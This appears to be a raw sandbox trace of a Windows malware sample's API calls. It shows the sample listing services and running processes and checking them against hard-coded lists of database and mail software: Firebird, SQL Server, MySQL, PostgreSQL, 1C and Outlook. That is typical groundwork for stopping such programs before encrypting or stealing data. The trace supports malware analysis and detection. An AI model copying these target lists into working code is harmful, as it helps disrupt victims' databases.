	[0046.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0046.305] lstrlenW (lpString="PcaSvc") returned 6
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0046.306] lstrlenW (lpString="PlugPlay") returned 8
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0046.306] lstrlenW (lpString="Power") returned 5
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0046.306] lstrlenW (lpString="ProfSvc") returned 7
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0046.306] lstrlenW (lpString="RpcEptMapper") returned 12
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0046.306] lstrlenW (lpString="RpcSs") returned 5
	[0046.306] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0046.306] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0046.306] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0046.306] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0046.307] lstrlenW (lpString="SamSs") returned 5
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0046.307] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0046.307] lstrlenW (lpString="Schedule") returned 8
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0046.307] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0046.307] lstrlenW (lpString="SENS") returned 4
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0046.307] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0046.307] lstrlenW (lpString="ShellHWDetection") returned 16
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0046.307] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0046.307] lstrlenW (lpString="Spooler") returned 7
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0046.307] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0046.307] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0046.307] lstrlenW (lpString="swprv") returned 5
	[0046.307] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0046.307] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0046.308] lstrlenW (lpString="SysMain") returned 7
	[0046.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0046.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0046.308] lstrlenW (lpString="Themes") returned 6
	[0046.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0046.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0046.308] lstrlenW (lpString="TrkWks") returned 6
	[0046.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0046.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0046.308] lstrlenW (lpString="UxSms") returned 5
	[0046.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0046.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0046.308] lstrlenW (lpString="VSS") returned 3
	[0046.308] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0046.308] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0046.308] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0046.308] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0046.308] lstrlenW (lpString="WdiServiceHost") returned 14
	[0046.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0046.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0046.309] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0046.309] lstrlenW (lpString="WdiSystemHost") returned 13
	[0046.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0046.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0046.309] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0046.309] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0046.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0046.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0046.309] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0046.309] lstrlenW (lpString="Winmgmt") returned 7
	[0046.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0046.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0046.309] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0046.309] lstrlenW (lpString="WPDBusEnum") returned 10
	[0046.309] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0046.309] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0046.309] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0046.309] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0046.309] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0046.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0
	[0046.312] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0046.312] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0046.312] lstrlenW (lpString="System") returned 6
	[0046.312] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0046.313] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0046.313] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0046.313] lstrlenW (lpString="smss.exe") returned 8
	[0046.313] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0046.313] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0046.313] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.314] lstrlenW (lpString="csrss.exe") returned 9
	[0046.314] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0046.314] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0046.314] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0046.314] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0046.314] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0046.314] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0046.314] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0046.314] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0046.315] lstrlenW (lpString="wininit.exe") returned 11
	[0046.315] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0046.315] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0046.315] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0046.315] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0046.315] lstrlenW (lpString="csrss.exe") returned 9
	[0046.315] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0046.316] lstrlenW (lpString="winlogon.exe") returned 12
	[0046.316] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0046.316] lstrlenW (lpString="services.exe") returned 12
	[0046.316] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0046.317] lstrlenW (lpString="lsass.exe") returned 9
	[0046.317] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0046.317] lstrlenW (lpString="lsm.exe") returned 7
	[0046.317] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.317] lstrlenW (lpString="svchost.exe") returned 11
	[0046.318] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.318] lstrlenW (lpString="svchost.exe") returned 11
	[0046.318] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.318] lstrlenW (lpString="svchost.exe") returned 11
	[0046.319] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.319] lstrlenW (lpString="svchost.exe") returned 11
	[0046.319] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.319] lstrlenW (lpString="svchost.exe") returned 11
	[0046.319] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0046.320] lstrlenW (lpString="audiodg.exe") returned 11
	[0046.320] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.320] lstrlenW (lpString="svchost.exe") returned 11
	[0046.320] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.321] lstrlenW (lpString="svchost.exe") returned 11
	[0046.321] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0046.321] lstrlenW (lpString="dwm.exe") returned 7
	[0046.321] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0046.322] lstrlenW (lpString="explorer.exe") returned 12
	[0046.322] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0046.322] lstrlenW (lpString="spoolsv.exe") returned 11
	[0046.322] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.323] lstrlenW (lpString="taskhost.exe") returned 12
	[0046.323] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0046.323] lstrlenW (lpString="svchost.exe") returned 11
	[0046.323] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0046.324] lstrlenW (lpString="taskeng.exe") returned 11
	[0046.324] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0046.324] lstrlenW (lpString="taskhost.exe") returned 12
	[0046.324] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0046.325] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0046.325] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0046.325] lstrlenW (lpString="python tragedy.exe") returned 18
	[0046.325] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0046.326] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0046.326] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0046.326] lstrlenW (lpString="computers.exe") returned 13
	[0046.326] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0046.327] lstrlenW (lpString="separated.exe") returned 13
	[0046.327] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0046.327] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0046.327] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0046.328] lstrlenW (lpString="darkness.exe") returned 12
	[0046.328] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0046.328] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0046.328] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0046.328] lstrlenW (lpString="sophisticated.exe") returned 17
	[0046.329] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0046.329] lstrlenW (lpString="wishlist.exe") returned 12
	[0046.329] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0046.329] lstrlenW (lpString="top.exe") returned 7
